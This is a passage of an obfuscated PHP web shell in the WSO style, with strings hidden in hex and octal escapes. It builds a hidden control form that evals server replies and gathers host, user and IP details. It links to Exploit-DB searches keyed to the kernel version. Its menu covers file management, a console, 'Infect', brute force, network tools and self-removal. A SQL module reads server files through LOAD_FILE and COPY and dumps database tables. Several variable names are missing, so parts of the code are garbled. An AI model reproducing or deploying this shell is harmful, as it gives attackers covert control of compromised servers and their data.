$_COOKIE[md5($_SERVER["\x48\124\124\120\137\x48\x4f\123\x54"]) . "\153\145\x79"] . "\x27\x29\73\xa\x9\x9\144\56\x6d\146\x2e\x70\x31\x2e\166\141\154\165\145\x20\x3d\40\x65\156\x63\x72\x79\160\x74\50\x64\56\155\x66\x2e\x70\61\x2e\x76\x61\x6c\x75\x65\54\x27" . $_COOKIE[md5($_SERVER["\x48\x54\x54\x50\x5f\x48\117\123\x54"]) . "\x6b\145\171"] . "\x27\51\x3b\12\11\x9\144\56\x6d\x66\x2e\160\62\x2e\166\141\x6c\x75\145\x20\x3d\40\x65\x6e\x63\x72\x79\160\164\50\x64\x2e\x6d\x66\x2e\160\62\x2e\x76\x61\154\165\x65\x2c\x27" . $_COOKIE[md5($_SERVER["\110\x54\x54\120\137\x48\117\x53\124"]) . "\153\145\x79"] . "\x27\51\x3b\12\x9\x9\144\56\x6d\146\56\x70\63\56\166\141\x6c\165\145\40\x3d\40\x65\156\x63\162\171\x70\x74\50\x64\x2e\x6d\146\56\160\x33\56\166\141\154\x75\x65\x2c\47" . $_COOKIE[md5($_SERVER["\x48\x54\x54\x50\137\110\117\x53\124"]) . "\153\145\x79"] . "\x27\51\x3b\xa\11\x9\151\x66\x28\x63\x68\x61\162\x73\x65\x74\41\x3d\x6e\x75\154\154\x29\x64\56\x6d\146\x2e\x63\x68\141\x72\163\x65\164\56\166\x61\x6c\165\145\75\143\150\x61\x72\163\x65\164\x3b\145\x6c\x73\145\x20\144\56\x6d\146\x2e\143\150\141\x72\x73\x65\164\56\166\x61\x6c\165\x65\x3d\x63\150\x61\x72\x73\x65\164\137\73\xa\11\x7d\xa\11\x66\x75\156\x63\164\x69\157\156\x20\147\50\141\x2c\143\x2c\x70\61\54\x70\x32\x2c\160\63\54\x63\x68\141\162\163\x65\x74\51\40\173\xa\x9\11\163\x65\164\x28\141\54\143\x2c\160\61\54\160\62\x2c\160\63\x2c\x63\x68\x61\162\163\x65\164\51\73\xa\11\11\144\x2e\x6d\146\56\163\x75\142\155\151\164\50\x29\x3b\xa\11\x7d\12\x9\146\165\156\143\164\x69\x6f\156\40\141\50\x61\54\x63\54\160\x31\54\x70\x32\54\x70\63\x2c\x63\x68\x61\x72\x73\145\164\51\x20\173\12\x9\11\x73\x65\x74\50\x61\x2c\x63\54\x70\x31\54\x70\x32\x2c\x70\63\x2c\x63\x68\x61\x72\163\x65\164\51\73\xa\11\11\166\x61\162\x20\x70\x61\162\141\x6d\x73\40\75\40\47\141\152\141\x78\x3d\164\x72\x75\x65\x27\x3b\xa\11\x9\146\x6f\x72\x28\x69\75\x30\x3b\x69\x3c\144\56\155\146\56\x65\154\x65\155\145\156\x74\163\x2e\154\145\x6e\x67\164\150\x3b\151\x2b\x2b\x29\xa\11\11\11\x70\141\x72\x61\155\x73\x20\53\x3d\x20\x27\46\47\x2b\x64\56\x6d\146\56\x65\154\x65\x6d\145\x6e\164\163\x5b\151\x5d\56\x6e\141\x6d\145\x2b\47\x3d\47\53\x65\156\x63\x6f\x64\145\x55\x52\x49\x43\157\x6d\160\x6f\156\x65\156\164\x28\x64\56\155\146\x2e\145\154\x65\155\x65\x6e\164\x73\x5b\x69\x5d\x2e\166\x61\154\165\x65\51\x3b\xa\x9\11\x73\x72\x28\x27" . addslashes($_SERVER["\x52\x45\121\125\x45\x53\124\x5f\x55\122\x49"]) . "\x27\x2c\x20\160\x61\162\141\x6d\x73\51\73\xa\x9\x7d\xa\x9\x66\x75\x6e\x63\x74\151\157\x6e\x20\x73\162\x28\x75\x72\x6c\54\x20\x70\x61\162\141\x6d\x73\x29\40\173\xa\11\11\x69\x66\x20\50\x77\151\x6e\x64\x6f\x77\x2e\130\x4d\x4c\x48\x74\x74\160\x52\145\161\x75\145\163\x74\x29\12\11\11\11\162\x65\x71\x20\x3d\x20\x6e\x65\167\40\130\115\114\110\164\164\x70\x52\145\161\x75\145\163\164\x28\x29\x3b\xa\11\x9\x65\x6c\x73\x65\40\151\146\x20\x28\167\151\x6e\x64\157\167\x2e\101\x63\164\x69\166\x65\130\x4f\x62\x6a\x65\143\164\51\12\x9\11\11\x72\x65\161\40\x3d\x20\x6e\145\167\x20\101\143\164\151\166\145\x58\117\142\152\145\143\x74\x28\x27\x4d\x69\x63\x72\157\163\157\146\164\x2e\130\115\x4c\110\124\124\x50\47\x29\x3b\12\40\x20\x20\40\40\40\40\x20\x69\146\x20\x28\162\145\161\x29\40\173\xa\x20\40\40\40\x20\x20\x20\40\40\40\40\x20\x72\145\x71\56\x6f\x6e\x72\145\x61\144\x79\163\164\141\164\x65\143\150\141\x6e\147\x65\40\75\x20\160\162\157\x63\x65\163\163\122\145\x71\x43\150\141\x6e\147\x65\x3b\12\x20\x20\40\40\x20\40\x20\40\x20\40\x20\x20\x72\x65\x71\56\157\x70\145\x6e\x28\x27\120\117\123\x54\x27\54\40\165\x72\154\x2c\40\x74\162\x75\x65\x29\x3b\12\40\40\40\40\40\40\x20\40\40\x20\x20\40\162\145\x71\56\x73\x65\x74\122\145\161\165\145\163\x74\110\x65\141\x64\145\x72\40\50\47\x43\x6f\x6e\x74\145\x6e\x74\55\124\x79\x70\145\47\54\x20\x27\141\x70\x70\x6c\x69\143\141\x74\x69\x6f\x6e\57\x78\x2d\167\167\x77\x2d\146\157\162\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\144\x65\x64\47\51\73\xa\x20\x20\40\40\x20\x20\40\x20\40\x20\x20\40\162\145\x71\x2e\x73\x65\x6e\144\x28\x70\x61\162\x61\x6d\x73\x29\73\xa\40\x20\40\x20\40\x20\40\40\175\xa\11\175\xa\11\146\x75\156\143\164\x69\157\x6e\x20\x70\x72\157\143\145\163\x73\122\x65\161\x43\150\141\x6e\x67\145\50\x29\x20\173\xa\x9\11\151\x66\x28\x20\x28\162\145\161\56\162\145\x61\x64\171\123\x74\x61\164\145\40\x3d\x3d\x20\64\x29\40\x29\12\11\x9\x9\151\146\50\x72\145\161\x2e\163\164\141\x74\x75\163\x20\x3d\75\x20\62\x30\60\x29\40\173\xa\11\11\x9\11\166\x61\x72\x20\162\x65\147\x20\75\40\x6e\145\167\x20\122\x65\147\x45\x78\160\x28\x22\50\x5c\134\144\53\x29\50\133\x5c\134\123\134\x5c\x73\x5d\x2a\51\42\54\x20\47\x6d\47\x29\x3b\12\x9\x9\11\x9\x76\141\162\x20\141\162\162\75\162\145\x67\56\x65\x78\x65\x63\50\x72\x65\x71\56\x72\145\x73\x70\x6f\x6e\x73\x65\x54\145\170\x74\x29\x3b\xa\x9\x9\11\x9\x65\x76\x61\x6c\x28\141\x72\162\x5b\x32\135\56\163\x75\142\163\x74\x72\x28\x30\x2c\x20\141\x72\x72\133\61\x5d\x29\x29\73\12\x9\x9\11\x7d\x20\x65\x6c\x73\x65\40\x61\x6c\x65\162\164\50\47\x52\145\x71\x75\x65\x73\x74\x20\145\x72\x72\x6f\162\41\47\x29\73\12\11\x7d\12\x3c\x2f\163\x63\162\151\x70\x74\x3e\12\74\x68\x65\141\144\x3e\x3c\x62\157\144\x79\x3e\x3c\x64\151\166\x20\x73\164\x79\154\x65\75\x27\160\157\x73\x69\164\151\157\x6e\72\141\x62\163\157\x6c\x75\x74\x65\x3b\142\141\143\153\x67\x72\157\165\x6e\144\x2d\143\157\154\157\162\x3a\x72\147\142\x61\50\x39\x35\54\x20\61\x31\60\x2c\x20\61\63\x30\x2c\40\x30\56\x33\x29\73\x77\151\144\x74\150\72\x31\x30\x30\x25\x3b\x74\157\160\72\60\73\154\145\x66\x74\72\60\x3b\x27\x3e\12\x3c\146\157\x72\x6d\40\x6d\145\x74\150\x6f\x64\x3d\x70\157\x73\164\x20\156\x61\155\145\x3d\155\146\x20\163\x74\171\154\x65\75\x27\x64\151\x73\x70\x6c\141\171\x3a\x6e\x6f\x6e\145\73\x27\x3e\xa\74\151\x6e\160\165\x74\x20\x74\x79\160\x65\75\x68\151\x64\x64\x65\156\x20\156\141\x6d\x65\75\x61\76\xa\74\x69\156\160\x75\164\40\x74\x79\160\145\75\x68\151\144\144\145\x6e\x20\156\x61\155\145\x3d\x63\x3e\xa\74\x69\x6e\160\165\x74\40\x74\x79\x70\x65\75\x68\x69\144\144\145\156\40\x6e\141\x6d\x65\75\160\61\x3e\xa\74\151\x6e\160\x75\x74\40\x74\x79\x70\x65\75\x68\151\144\x64\145\156\40\156\x61\155\x65\x3d\160\x32\x3e\xa\x3c\x69\156\160\165\164\40\164\x79\160\145\x3d\x68\x69\x64\144\145\156\x20\x6e\x61\155\145\x3d\x70\x33\x3e\xa\x3c\x69\x6e\x70\x75\x74\40\164\x79\160\x65\75\150\x69\x64\144\x65\x6e\40\156\x61\x6d\x65\x3d\x63\x68\x61\162\163\145\x74\76\12\x3c\x2f\146\157\x72\x6d\76"; $freeSpace = @diskfreespace($GLOBALS["\x63\167\144"]); $totalSpace = @disk_total_space($GLOBALS["\x63\167\x64"]); $totalSpace = $totalSpace ? $totalSpace : 1; $release = @php_uname("\162"); $kernel = @php_uname("\x73"); $explink = "\x68\164\x74\x70\72\57\x2f\156\x75\x6c\x6c\162\x65\146\145\162\x2e\x63\157\x6d\x2f\77\150\x74\x74\160\163\x3a\57\57\167\x77\x77\56\145\x78\160\154\x6f\x69\x74\55\144\142\x2e\x63\157\155\57\x73\145\141\162\143\x68\x2f\77\x61\x63\164\151\x6f\156\75\163\x65\141\162\x63\x68\x26\144\x65\x73\x63\162\x69\160\164\151\157\156\x3d"; if (strpos("\114\151\x6e\165\x78", $kernel) !== false) { $explink .= urlencode("\114\x69\156\165\170\40\113\145\162\156\145\154\x20" . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . "\x20" . substr($release, 0, 3)); } if (!function_exists("\x70\x6f\163\151\x78\137\147\145\x74\x65\147\x69\x64")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "\77"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid["\156\x61\155\x65"]; $uid = $uid["\165\x69\x64"]; $group = $gid["\x6e\141\x6d\145"]; $gid = $gid["\147\x69\x64"]; } $cwd_links = ''; $path = explode("\57", $GLOBALS["\143\167\144"]); $n = count($path); for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "\74\x61\40\150\162\145\x66\75\x27\43\x27\x20\x6f\x6e\x63\x6c\151\143\153\75\47\x67\x28\x22\106\151\x6c\x65\x73\115\x61\156\42\x2c\42"; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . "\57"; } $cwd_links .= "\42\x29\47\76" . $path[$i] . "\x2f\74\57\x61\76"; } $charsets = array("\x55\x54\x46\x2d\70", "\127\x69\156\x64\x6f\167\163\55\61\x32\x35\61", "\x4b\x4f\x49\70\x2d\x52", "\x4b\117\x49\x38\55\125", "\x63\x70\x38\66\66"); $opt_charsets = ''; foreach ($charsets as $) { $opt_charsets .= "\74\x6f\160\x74\151\157\156\x20\166\x61\x6c\x75\145\x3d\x22" . $ . "\42\40" . ($_POST["\x63\x68\141\162\x73\145\x74"] == $ ? "\163\x65\x6c\145\x63\x74\x65\144" : '') . "\76" . $ . "\74\x2f\157\160\164\x69\157\156\x3e"; } $m = array("\123\x65\x63\56\x20\111\156\146\157" => "\123\145\143\111\156\x66\x6f", "\106\x69\x6c\145\163" => "\106\x69\154\x65\x73\x4d\141\156", "\x43\x6f\156\x73\157\154\145" => "\x43\157\156\163\157\154\145", "\111\x6e\x66\x65\x63\x74" => "\111\156\146\x65\143\164", "\x53\161\x6c" => "\123\161\154", "\120\150\160" => "\120\150\x70", "\123\141\x66\x65\x20\x6d\x6f\144\145" => "\123\141\146\145\x4d\157\144\x65", "\x53\164\162\151\x6e\x67\x20\164\157\x6f\x6c\163" => "\123\164\x72\151\156\147\124\x6f\x6f\x6c\x73", "\x42\x72\x75\164\145\146\157\x72\143\x65" => "\x42\x72\165\x74\145\146\157\x72\143\145", "\x4e\x65\164\x77\157\162\153" => "\x4e\x65\x74\x77\157\162\x6b"); if (!empty($GLOBALS["\xe2\226\x9b"])) { $m["\114\157\x67\x6f\x75\x74"] = "\114\157\147\x6f\165\164"; } $m["\x53\x65\x6c\x66\x20\x72\145\155\157\166\145"] = "\x53\145\x6c\146\x52\x65\155\x6f\x76\x65"; $menu = ''; foreach ($m as $k => $v) { $menu .= "\74\164\150\x3e\133\x20\x3c\141\x20\x68\x72\x65\146\75\42\x23\42\40\x6f\156\143\x6c\151\x63\x6b\x3d\42\x67\x28\x27" . $v . "\47\54\156\x75\154\x6c\x2c\47\47\54\x27\47\x2c\47\x27\x29\42\x3e" . $k . "\74\57\141\x3e\40\135\x3c\57\164\x68\76"; } $drives = ''; if ($GLOBALS["\157\163"] == "\167\x69\156") { foreach (range("\x63", "\x7a") as $drive) { if (is_dir($drive . "\72\134")) { $drives .= "\74\141\x20\150\x72\145\x66\75\42\43\x22\x20\x6f\x6e\x63\x6c\x69\143\153\75\x22\147\x28\47\106\x69\154\145\163\x4d\141\156\x27\x2c\47" . $drive . "\x3a\x2f\47\x29\42\x3e\133\x20" . $drive . "\x20\135\74\x2f\141\x3e\40"; } } } echo "\x3c\x74\141\x62\x6c\145\40\x63\154\141\x73\163\75\151\x6e\x66\x6f\x20\x63\145\x6c\x6c\x70\x61\144\x64\x69\156\147\x3d\x33\x20\x63\145\x6c\154\x73\160\141\x63\151\156\x67\x3d\60\x20\167\x69\x64\164\x68\75\61\60\x30\x25\76\x3c\x74\x72\76\x3c\164\144\40\167\151\x64\x74\x68\75\x31\76\74\x73\x70\x61\x6e\x3e\x55\x6e\141\155\145\x3a\74\x62\162\x3e\x55\x73\145\162\x3a\x3c\142\162\x3e\x50\150\160\x3a\x3c\142\162\76\x48\144\x64\x3a\x3c\142\x72\x3e\103\x77\x64\72" . ($GLOBALS["\157\x73"] == "\167\x69\156" ? "\x3c\x62\x72\76\104\162\151\166\145\163\72" : '') . "\x3c\x2f\163\x70\141\156\76\74\x2f\x74\x64\x3e" . "\x3c\x74\144\76\74\x6e\157\x62\162\x3e" . substr(@php_uname(), 0, 120) . "\40\x3c\141\40\x68\x72\145\x66\x3d\x22\150\x74\x74\x70\x73\72\x2f\57\156\x75\x6c\154\162\145\x66\x65\x72\56\x63\157\x6d\x2f\x3f\x68\x74\x74\160\x73\72\57\x2f\167\x77\x77\56\x67\x6f\x6f\x67\154\x65\56\x63\157\155\57\x73\x65\141\x72\143\x68\x3f\x71\x3d" . urlencode(@php_uname()) . "\42\x20\164\141\162\x67\145\x74\75\42\x5f\142\154\x61\156\x6b\x22\76\x5b\x20\x47\x6f\x6f\x67\154\145\x20\x5d\74\57\x61\x3e\x20\74\x61\x20\x68\x72\x65\x66\75\42" . $explink . "\x22\40\x74\x61\x72\147\145\x74\x3d\137\x62\x6c\141\x6e\x6b\x3e\133\x20\x45\170\x70\x6c\x6f\x69\x74\x2d\104\102\x20\135\74\57\141\76\x3c\57\x6e\x6f\142\x72\76\x3c\142\162\76" . $uid . "\x20\50\x20" . $user . "\40\x29\40\x3c\163\x70\x61\156\x3e\107\x72\x6f\165\160\72\74\57\x73\160\x61\156\x3e\x20" . $gid . "\x20\x28\40" . $group . "\x20\x29\74\x62\162\76" . @phpversion() . "\x20\74\163\160\x61\156\x3e\123\x61\x66\x65\40\x6d\x6f\x64\x65\72\x3c\x2f\163\160\141\156\76\40" . ($GLOBALS["\x73\x61\x66\145\137\155\157\x64\145"] ? "\74\146\157\156\x74\40\x63\x6f\154\157\162\x3d\x23\x61\x31\x30\67\60\65\x3e\x4f\116\74\x2f\x66\157\x6e\x74\x3e" : "\74\x66\x6f\156\x74\40\143\x6f\154\x6f\x72\x3d\x23\146\71\143\x34\x34\60\76\x3c\x62\76\117\x46\x46\x3c\57\x62\76\74\57\x66\157\x6e\x74\76") . "\40\x3c\141\x20\150\162\x65\x66\x3d\x23\x20\157\x6e\x63\x6c\x69\143\x6b\x3d\x22\147\x28\x27\x50\x68\160\x27\54\x6e\x75\154\154\54\x6e\x75\x6c\x6c\x2c\47\x69\x6e\146\x6f\47\x29\42\76\133\40\160\150\x70\151\156\146\157\40\135\x3c\57\x61\76\x20\x3c\163\x70\141\156\x3e\104\141\164\145\164\151\155\145\72\x3c\x2f\163\160\x61\156\x3e\40" . date("\131\55\155\x2d\x64\40\x48\72\151\x3a\x73") . "\x3c\x62\162\76" . viewSize($totalSpace) . "\40\74\163\x70\141\x6e\76\106\x72\x65\x65\72\74\57\x73\160\x61\x6e\76\40" . viewSize($freeSpace) . "\x20\50" . round(100 / ($totalSpace / $freeSpace), 2) . "\x25\x29\x3c\x62\x72\76" . $cwd_links . "\40" . viewPermsColor($GLOBALS["\143\167\x64"]) . "\40\x3c\x61\40\x68\162\145\146\x3d\x23\x20\157\x6e\x63\154\x69\x63\153\x3d\42\x67\x28\47\x46\x69\x6c\145\163\115\141\156\47\x2c\47" . $GLOBALS["\x68\157\x6d\145\137\x63\167\x64"] . "\x27\54\47\47\54\x27\47\x2c\47\x27\51\42\76\133\40\x68\157\x6d\145\x20\135\74\x2f\x61\76\x3c\x62\x72\76" . $drives . "\x3c\57\x74\x64\x3e" . "\74\x74\144\40\x77\151\x64\x74\x68\75\x31\x20\x61\x6c\151\147\x6e\x3d\162\x69\x67\x68\x74\x3e\74\x6e\x6f\x62\162\x3e\74\154\141\142\145\154\76\74\x73\145\154\145\x63\164\x20\x6f\156\x63\x68\x61\x6e\147\x65\75\x22\x67\50\x6e\x75\x6c\x6c\54\156\165\x6c\154\x2c\156\x75\x6c\154\x2c\156\165\154\154\x2c\x6e\165\154\x6c\54\x74\x68\151\x73\x2e\166\x61\x6c\x75\145\51\x22\x3e" . $opt_charsets . "\x3c\57\x73\145\154\145\x63\164\x3e\74\57\154\x61\142\145\x6c\76\x3c\x62\162\x3e\74\x73\x70\141\x6e\76\x53\x65\162\x76\x65\x72\x20\x49\120\72\x3c\57\163\x70\x61\156\x3e\74\x62\162\76" . gethostbyname($_SERVER["\110\x54\x54\x50\137\110\117\x53\124"]) . "\x3c\x62\162\x3e\74\x73\160\x61\156\76\x43\x6c\151\x65\x6e\x74\x20\111\x50\x3a\74\57\163\160\x61\156\x3e\x3c\x62\x72\x3e" . $_SERVER["\122\105\x4d\117\x54\x45\x5f\x41\104\x44\x52"] . "\x3c\x2f\156\157\x62\x72\x3e\74\57\x74\144\x3e\x3c\x2f\x74\162\76\x3c\x2f\164\141\142\154\145\76" . "\x3c\x74\x61\x62\x6c\x65\40\x73\164\171\154\145\x3d\42\x62\x61\x63\x6b\x67\162\157\x75\x6e\x64\55\143\x6f\x6c\x6f\162\72\43\60\x64\65\62\142\146\73\x22\40\x63\145\154\154\160\141\x64\144\x69\156\147\x3d\63\40\x63\145\154\154\x73\160\x61\x63\x69\156\x67\75\60\40\x77\151\144\164\150\75\61\60\x30\x25\x3e\x3c\164\x72\x3e" . $menu . "\74\57\164\x72\x3e\74\57\164\x61\142\x6c\145\76\74\x64\x69\x76\x3e"; } goto OWR26; rGxXC: function actionSql() { class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "\x6d\x79\163\161\154": if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } break; case "\x70\147\163\161\154": $host = explode("\72", $host); if (!$host[1]) { $host[1] = 5432; } if ($this->link = @pg_connect("\x68\x6f\x73\x74\75{$host[0]}\40\x70\157\162\164\x3d{$host[1]}\40\165\163\x65\162\x3d{$user}\x20\x70\141\x73\x73\167\x6f\162\x64\75{$pass}\40\144\142\156\x61\155\145\x3d{$dbname}")) { return true; } break; } return false; } function selectdb($db) { switch ($this->type) { case "\155\171\x73\x71\x6c": if (@mysql_select_db($db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "\155\171\163\161\x6c": return $this->res = @mysql_query($str); break; case "\160\x67\163\161\154": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { $res = func_num_args() ? func_get_arg(0) : $this->res; switch ($this->type) { case "\155\x79\163\161\x6c": return @mysql_fetch_assoc($res); break; case "\160\147\x73\x71\x6c": return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch ($this->type) { case "\155\171\163\161\x6c": return $this->query("\123\110\x4f\x57\x20\x64\141\164\141\142\141\x73\x65\x73"); break; case "\x70\x67\x73\x71\154": return $this->res = $this->query("\x53\105\x4c\x45\103\124\40\144\141\x74\156\141\x6d\145\x20\106\x52\117\115\40\x70\147\x5f\144\x61\x74\141\142\141\163\x65\x20\x57\110\x45\x52\x45\x20\144\x61\164\151\163\164\145\x6d\160\x6c\x61\x74\x65\41\x3d\x27\x74\x27"); break; } return false; } function listTables() { switch ($this->type) { case "\x6d\171\163\161\x6c": return $this->res = $this->query("\123\x48\117\127\40\x54\x41\102\x4c\105\x53"); break; case "\x70\x67\163\161\x6c": return $this->res = $this->query("\163\145\154\145\x63\164\40\164\x61\142\x6c\x65\x5f\x6e\141\155\x65\40\146\162\157\x6d\40\x69\x6e\146\x6f\162\x6d\141\164\x69\157\x6e\x5f\163\x63\150\145\x6d\141\56\164\141\x62\154\x65\x73\x20\x77\150\145\x72\x65\x20\164\x61\x62\154\145\x5f\x73\x63\150\145\x6d\x61\40\x21\75\40\47\151\156\x66\157\x72\x6d\141\x74\151\x6f\x6e\137\163\x63\x68\145\x6d\x61\x27\40\101\x4e\104\40\164\x61\142\x6c\x65\x5f\x73\x63\150\x65\155\141\40\41\75\40\x27\x70\x67\x5f\143\141\x74\141\x6c\x6f\x67\47"); break; } return false; } function error() { switch ($this->type) { case "\155\171\x73\x71\x6c": return @mysql_error(); break; case "\x70\147\x73\161\154": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "\155\171\163\161\154": if (function_exists("\x6d\171\163\x71\154\137\163\145\164\x5f\143\x68\141\162\163\145\x74")) { return @mysql_set_charset($str, $this->link); } else { $this->query("\x53\x45\124\x20\x43\110\x41\122\x53\x45\124\40" . $str); } break; case "\160\147\x73\x71\x6c": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "\155\171\163\161\x6c": return $this->fetch($this->query("\x53\105\114\x45\103\124\x20\114\x4f\x41\x44\137\x46\x49\x4c\105\50\47" . addslashes($str) . "\x27\x29\40\141\163\x20\x66\x69\x6c\x65")); break; case "\x70\x67\163\x71\154": $this->query("\x43\x52\x45\x41\x54\105\40\124\x41\x42\x4c\x45\x20\x68\x61\162\x64\x32\x28\x66\151\154\x65\40\164\x65\170\x74\x29\73\x43\117\120\131\x20\x68\141\x72\144\62\x20\106\x52\x4f\115\x20\x27" . addslashes($str) . "\47\73\x73\x65\154\145\143\164\x20\146\x69\x6c\x65\40\146\162\157\155\40\150\x61\162\x64\x32\73"); $r = array(); while ($i = $this->fetch()) { $r[] = $i["\x66\x69\x6c\x65"]; } $this->query("\x64\162\157\x70\40\164\141\x62\x6c\x65\x20\x68\141\x72\144\62"); return array("\x66\x69\x6c\x65" => implode("\xa", $r)); break; } return false; } function dump($table, $fp = false) { switch ($this->type) { case "\155\171\163\161\154": $res = $this->query("\x53\110\x4f\x57\40\x43\x52\105\101\x54\x45\40\x54\101\x42\114\105\x20\140" . $table . "\140"); $create = mysql_fetch_array($res); $sql = $create[1] . "\73\12"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $this->query("\x53\x45\x4c\x45\103\x54\40\52\40\106\122\117\115\x20\140" . $table . "\140"); $i = 0; $head = true; while ($ = $this->fetch()) { $sql = ''; if ($i % 1000 == 0) { $head = true; $sql = "\73\xa\xa"; } $columns = array(); foreach ($ as $k => $v) { if ($v === null) { $[$k] = "\116\125\x4c\x4c"; } elseif (is_int($v)) { $[$k] = $v; } else { $[$k] = "\47" . @mysql_real_escape_string($v) . "\x27"; } $columns[] = "\140" . $k . "\x60"; } if ($head) { $sql .= "\111\116\x53\x45\122\124\x20\111\116\124\x4f\x20\x60" . $table . "\140\x20\50" . implode("\54\x20", $columns) . "\51\x20\126\101\114\x55\x45\123\x20\xa\11\50" . implode("\54\x20", $) . "\51"; $head = false; } else { $sql .= "\xa\x9\x2c\50" . implode("\x2c\x20", $) . "\x29"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $i++; } if (!$head) { if ($fp) { fwrite($fp, "\73\12\12"); } else { echo "\73\12\12"; } } break; case "\160\x67\163\161\x6c": $this->query("\x53\105\x4c\x45\103\x54\x20\52\x20\106\122\117\x4d\x20" . $table); while ($ = $this->fetch()) { $columns = array(); foreach ($ as $k => $v) { $[$k] = "\47" . addslashes($v) . "\47"; $columns[] = $k; } $sql = "\x49\x4e\123\105\122\124\40\x49\116\124\x4f\40" . $table . "\x20\50" . implode("\x2c\x20", $columns) . "\x29\40\x56\x41\x4c\125\x45\123\x20\x28" . implode("\54\x20", $) . "\51\x3b" . "\12"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } break; } return false; } } $db = new DbClass($_POST["\164\171\160\145"]); if (@$_POST["\160\62"] == "\x64\x6f\x77\156\154\157\141\144" && @$_POST["\160\61"] != "\163\145\x6c\x65\143\x74") { $db->connect($_POST["\163\x71\154\x5f\150\x6f\163\x74"], $_POST["\163\x71\x6c\137\154\157\x67\151\156"], $_POST["\x73\161\154\x5f\160\x61\x73\163"], $_POST["\x73\161\154\137\142\x61\163\x65"]); $db->selectdb($_POST["\x73\x71\x6c\137\142\141\163\145"]); switch ($_POST["\143\x68\141\162\x73\x65\164"]) { case "\x57\x69\156\144\x6f\167\163\x2d\61\x32\x35\x31": $db->setCharset("\143\160\x31\62\x35\x31"); break; case "\125\124\106\55\x38": $db->setCharset("\x75\164\x66\70"); break; case "\x4b\x4f\111\70\55\x52": $db->setCharset("\x6b\x6f\x69\x38\x72"); break; case "\x4b\x4f\111\x38\x2d\x55": $db->setCharset("\153\157\151\x38\x75"); break; case "\x63\160\70\66\66": $db->setCharset("\143\x70\70\x36\66"); break; } if (empty($_POST["\x66\x69\154\145"])) { ob_start("\x6f\142\x5f\x67\172\150\141\x6e\x64\x6c\145\162", 4096); header("\x43\157\x6e\164\145\x6e\x74\55\x44\151\x73\x70\x6f\163\x69\164\x69\x6f\x6e\x3a\x20\141\x74\164\141\143\150\x6d\145\156\164\x3b\40\146\x69\154\145\156\x61\155\145\x3d\x64\x75\155\x70\56\163\161\154"); header("\x43\157\x6e\164\x65\x6e\164\x2d\x54\x79\x70\x65\72\40\x74\145\x78\164\57\x70\154\141\x69\156"); foreach ($_POST["\x74\x62\154"] as $v) { $db->dump($v); } die; } elseif ($fp = @fopen($_POST["\146\151\154\x65"], "\x77")) { foreach ($_POST["\164\x62\x6c"] as $v) { $db->dump($v, $fp); } fclose($fp); unset($_POST["\160\62"]); } else { die("\x3c\163\x63\x72\151\160\x74\x3e\141\154\145\162\x74\50\x22\x45\x72\x72\157\162\41\x20\103\x61\x6e\47\x74\x20\x6f\x70\x65\156\x20\x66\151\x6c\145\42\x29\73\167\x69\x6e\144\157\x77\x2e\x68\151\x73\164\157\162\171\56\x62\x61\143\153\50\x2d\61\51\74\x2f\163\143\162\151\160\164\x3e"); } } hardHeader(); echo "\12\74\150\61\x3e\123\x71\x6c\40\x62\x72\x6f\x77\163\x65\162\74\x2f\x68\61\76\x3c\x64\151\x76\x20\143\x6c\x61\x73\163\x3d\x63\x6f\x6e\164\145\x6e\x74\x3e\xa\74\146\157\x72\x6d\40\x6e\141\x6d\145\75\47\163\146\x27\x20\155\145\x74\150\157\144\75\x27\160\157\x73\164\x27\x20\x6f\156\x73\x75\x62\x6d\x69\164\x3d\x27\x66\x73\50\164\x68\151\x73\x29\73\47\76\74\164\141\142\x6c\x65\x20\x63\145\154\154\160\x61\x64\144\x69\x6e\x67\75\47\62\47\x20\x63\x65\154\154\163\160\x61\143\x69\156\x67\75\47\x30\47\76\74\164\162\x3e\xa\x3c\x74\144\76\x54\171\160\145\74\57\x74\x64\76\x3c\x74\x64\x3e\110\157\x73\x74\x3c\57\x74\144\x3e\74\x74\x64\76\114\157\x67\151\x6e\x3c\x2f\x74\x64\76\74\x74\x64\76\120\x61\163\x73\x77\x6f\162\144\x3c\x2f\x74\x64\76\x3c\164\x64\76\104\x61\164\141\x62\141\163\145\74\57\164\x64\76\74\164\144\x3e\x3c\x2f\x74\x64\76\74\57\x74\x72\x3e\x3c\x74\162\x3e\12\x3c\x69\156\160\x75\x74\x20\164\x79\x70\x65\x3d\150\151\x64\144\145\156\40\156\141\x6d\145\x3d\x6e\x65\40\166\141\x6c\x75\145\x3d\47\47\x3e\x3c\x69\x6e\160\x75\164\x20\164\171\160\145\75\x68\x69\x64\x64\145\x6e\x20\x6e\141\x6d\145\75\x61\x20\166\141\154\165\x65\x3d\123\x71\154\76\x3c\151\x6e\x70\165\x74\40\x74\171\x70\145\x3d\150\151\144\x64\145\156\40\x6e\x61\x6d\145\x3d\160\x31\x20\x76\x61\154\165\145\x3d\x27\x71\165\x65\x72\x79\47\76\x3c\151\x6e\x70\x75\164\x20\x74\171\x70\145\75\x68\x69\x64\144\x65\156\x20\156\x61\x6d\145\75\x70\x32\x20\x76\141\154\165\145\x3d\47\47\76\74\151\156\160\165\164\40\x74\171\160\x65\75\x68\x69\144\144\x65\x6e\40\156\141\x6d\x65\75\x63\40\166\141\154\x75\x65\75\x27" . htmlspecialchars($GLOBALS["\x63\x77\144"]) . "\x27\76\x3c\151\x6e\160\x75\164\x20\164\171\x70\x65\x3d\x68\x69\144\144\145\156\40\156\x61\x6d\x65\x3d\x63\x68\141\x72\163\x65\x74\x20\166\141\154\x75\145\x3d\x27" . (isset($_POST["\x63\150\x61\162\x73\x65\164"]) ? 